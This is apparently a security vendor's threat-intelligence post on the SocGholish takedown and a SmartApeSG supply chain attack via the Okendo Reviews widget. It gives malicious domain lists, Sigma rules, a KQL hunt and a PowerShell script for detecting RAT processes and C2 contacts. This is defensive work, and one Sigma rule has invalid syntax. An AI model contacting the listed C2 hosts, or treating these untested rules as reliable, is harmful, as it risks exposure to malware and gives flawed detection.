Back to Intelligence

SocGholish Disruption & Okendo Supply Chain Attack: OTX Pulse Analysis — APT Infrastructure & RAT Detection

SA
Security Arsenal Team
June 21, 2026
6 min read

Threat Summary

Recent OTX pulses highlight a complex threat landscape involving the disruption of a major malware distributor, the emergence of a sophisticated supply chain attack, and the exposure of massive nation-state-aligned C2 infrastructure. Operation Endgame has disrupted the GOLD PRELUDE (TA569) SocGholish campaign, taking down 106 servers, but secondary payloads like IcedID and Pikabot remain a threat. Concurrently, threat actor SmartApeSG has launched a supply chain attack via the Okendo Reviews widget, injecting malicious JavaScript to deploy NetSupport RAT and Remcos. Furthermore, intelligence reveals over 1,350 C2 servers concentrated in the Middle East (hosted largely by STC) facilitating campaigns by APT28, ENERGETIC BEAR, and others using IoT botnets and commodity RATs.

Threat Actor / Malware Profile

GOLD PRELUDE (TA569) & SocGholish

  • Profile: Prolific initial access broker and malware distributor active since 2017.
  • Distribution: SEO poisoning and compromised WordPress sites delivering fake browser update prompts.
  • Payloads: SocGholish (JS loader) leading to IcedID, QakBot, Pikabot, and Rhadamanthys.
  • Behavior: The fake browser updates trick users into executing malicious JScript, which establishes a foothold for loader malware.

SmartApeSG

  • Profile: Threat actor targeting the e-commerce sector.
  • Distribution: Supply chain compromise via the Okendo Reviews widget (customer review platform).
  • Payloads: NetSupport Manager, Remcos RAT, StealC.
  • Behavior: Malicious JavaScript is injected into legitimate e-commerce pages (okendo-reviews.js). It uses localStorage for staging and obfuscation to load remote payloads.

Malware Families

  • NetSupport Manager / Remcos RAT: Legitimate remote administration tools abused for C2. They allow full system control, file transfer, and credential harvesting.
  • SocGholish: A JavaScript-based malware framework designed to drop and execute subsequent payloads.
  • IcedID / Pikabot: Banking trojans and botnets used for credential theft and lateral movement.

IOC Analysis

  • Indicator Types:
    • Hostnames: A large set of compromised WordPress domains (e.g., trademark.iglesiaelarca.com, billing.roofnrack.us) used for payload delivery by SocGholish.
    • URLs: Specific malicious endpoints used in the Okendo attack (api.wigetticks.com, api.wizzleticks.com) and the compromised widget URL (cdn-static.okendo.io/reviews-widget-plus/js/okendo-reviews.js).
    • CVE: CVE-2025-11953 (associated with the Middle East infrastructure activity).
  • Operationalization: SOC teams should ingest the list of hostnames into web proxy blocklists and DNS firewalls. The URLs should be blocked at the gateway. CVE-2025-11953 requires immediate patching assessment.
  • Decoding Tools: Web proxies (Zscaler/Cisco), EDR telemetry (CrowdStrike/SentinelOne), and SIEM correlation (Splunk/Microsoft Sentinel).

Detection Engineering

Sigma Rules

YAML
---
title: Potential Fake Browser Update Execution - SocGholish
description: Detects execution of scripts often associated with fake browser updates used by SocGholish TA569.
status: experimental
date: 2026/06/22
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/63567491-9a02-4e9d-8c89-7d5e5a1b3c61/
tags:
    - attack.initial_access
    - attack.t1189
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        Image|endswith:
            - '\wscript.exe'
            - '\cscript.exe'
            - '\mshta.exe'
    selection_cli:
        CommandLine|contains:
            - 'update'
            - 'browser'
            - 'chrome.exe'
            - 'iexplorer.exe'
    selection_extension:
        CommandLine|contains:
            - '.js'
            - '.jse'
    condition: all of selection_*
falsepositives:
    - Legitimate software update scripts
level: high
---
title: Suspicious Connection to Okendo Supply Chain C2
description: Detects network connections to domains associated with the SmartApeSG Okendo Reviews supply chain attack.
status: experimental
date: 2026/06/22
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/63567491-9a02-4e9d-8c89-7d5e5a1b3c62/
tags:
    - attack.command_and_control
    - attack.t1071
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        DestinationHostname|contains:
            - 'wigetticks.com'
            - 'wizzleticks.com'
    condition: selection
falsepositives:
    - Unknown
level: critical
---
title: Remote Access Tool Execution - NetSupport and Remcos
description: Detects execution of known Remote Access Trojans often dropped by supply chain attacks like Okendo or SocGholish loaders.
status: experimental
date: 2026/06/22
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/63567491-9a02-4e9d-8c89-7d5e5a1b3c62/
tags:
    - attack.execution
    - attack.t1059
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|contains:
            - 'client32.exe'
            - 'remcos.exe'
            - 'gps.exe'
        or
        OriginalFileName|contains:
            - 'client32.exe'
            - 'remcos.exe'
    condition: selection
falsepositives:
    - Legitimate administrative use (rare)
level: high

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for connections to known malicious domains from Okendo and SocGholish pulses
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl in (
    'trademark.iglesiaelarca.com',
    'content.garretttrails.org',
    'promo.summat10n.org',
    'billing.roofnrack.us',
    'devel.asurans.com',
    'storehouse.beautysupplysalonllc.com',
    'samples.addisgraphix.com',
    'api-app.uppercrafteroom.com',
    'api.wigetticks.com',
    'api.wizzleticks.com',
    'cdn-static.okendo.io/reviews-widget-plus/js/okendo-reviews.js'
)
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteUrl, RemoteIP
| extend HostName = iff(RemoteUrl has 'wigetticks' or RemoteUrl has 'wizzleticks', 'SmartApeSG C2', 'SocGholish Compromised Site')

PowerShell Hunt Script

PowerShell
# IOC Hunt for SmartApeSG and RAT artifacts
Write-Host "[+] Hunting for Okendo Supply Chain and RAT artifacts..."

# 1. Check DNS Cache for malicious domains
$MaliciousDomains = @(
    "api.wigetticks.com",
    "api.wizzleticks.com",
    "trademark.iglesiaelarca.com",
    "billing.roofnrack.us"
)

$DnsCache = Get-DnsClientCache | Where-Object { $MaliciousDomains -contains $_.Entry }
if ($DnsCache) {
    Write-Host "[!] WARNING: Found DNS cache entries for malicious domains:" -ForegroundColor Red
    $DnsCache | Format-Table Entry, Data, TimeToLive
} else {
    Write-Host "[-] No malicious DNS cache entries found." -ForegroundColor Green
}

# 2. Check for known RAT processes
$RatProcesses = @("client32.exe", "remcos.exe", "gps.exe", "regasm.exe", "msbuild.exe") # Regasm/MSBuild often used for evasion
$RunningProcs = Get-Process | Where-Object { $RatProcesses -contains $_.ProcessName }

if ($RunningProcs) {
    Write-Host "[!] WARNING: Found suspicious RAT processes running:" -ForegroundColor Red
    $RunningProcs | Format-Table ProcessName, Id, Path
} else {
    Write-Host "[-] No known RAT processes found." -ForegroundColor Green
}

# 3. Check for suspicious file modifications in Okendo paths (if applicable)
$OkendoPaths = @("C:\inetpub\wwwroot", "C:\xampp\htdocs") # Common web roots
Write-Host "[*] Checking for okendo-reviews.js modifications in common web roots..."
foreach ($path in $OkendoPaths) {
    if (Test-Path $path) {
        $files = Get-ChildItem -Path $path -Recurse -Filter "okendo-reviews.js" -ErrorAction SilentlyContinue
        if ($files) {
            Write-Host "[!] Found Okendo Review Widget files. Verify integrity manually:" -ForegroundColor Yellow
            $files | Select-Object FullName, LastWriteTime
        }
    }
}

Response Priorities

Immediate (0-24h)

  • Block IOCs: Immediately block all listed hostnames and URLs at the web proxy and firewall.
  • Quarantine: Identify and quarantine systems communicating with wigetticks.com or wizzleticks.com.
  • Patch: Assess vulnerability status for CVE-2025-11953 in the environment.

24h - 48h

  • Web Server Forensics: If hosting WordPress or Okendo widgets, scan for the specific IOCs (okendo-reviews.js modifications, unauthorized plugins).
  • Credential Reset: Force password resets for accounts on machines where NetSupport RAT or Remcos activity was suspected.

1 Week

  • Supply Chain Audit: Review all third-party JavaScript integrations (e.g., widgets, chatbots) for unauthorized modifications.
  • Architectural Hardening: Implement strict Content Security Policy (CSP) to mitigate future JavaScript injection supply chain attacks.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-aptsocgholishsupply-chainnetsupport-ratremcosmiddle-east-c2

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action